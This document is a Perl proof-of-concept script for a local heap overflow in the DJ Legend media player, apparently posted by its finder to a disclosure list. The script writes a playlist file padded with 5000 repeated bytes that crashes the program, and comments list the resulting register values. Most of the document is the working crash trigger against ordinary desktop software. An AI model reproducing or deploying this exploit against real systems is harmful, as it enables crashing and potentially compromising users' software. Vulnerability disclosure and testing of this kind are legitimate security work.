|
#!/usr/bin/perl
# DJ Legend [.m3u / .pls File ] Local Heap Overflow Poc
# www.djlegend.net/<http://www.djlegend.net/>
# Found By : SkuLL-HacKeR
# Msn : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com>
########################################################################################
#EAX 45454545
#ESP 0012EF6C
#EBP 00DA50F8 ASCII "C:\Program Files\DJ Legend Trial\SkuLL-HacKeR.m3u"
#ESI 0012EFD8
#EDI 014143F8
#EBP 00000000
#ESI 02CD7102
#EIP 7C90EAF0 ntdll.KiFastSystemCallRet
use strict;
use warnings;
my $A= "\x45" x 5000;
open(my $ofl_playlist, "> SkuLL-HacKeR.M3u");
print $ofl_playlist
$A.
"\r\n";
close $ofl_playlist;
________________________________
Windows Live Messenger Windows Live Messenger, l'unico e l'originale. Diffida dalle imitazioni!<http://www.messenger.it>
|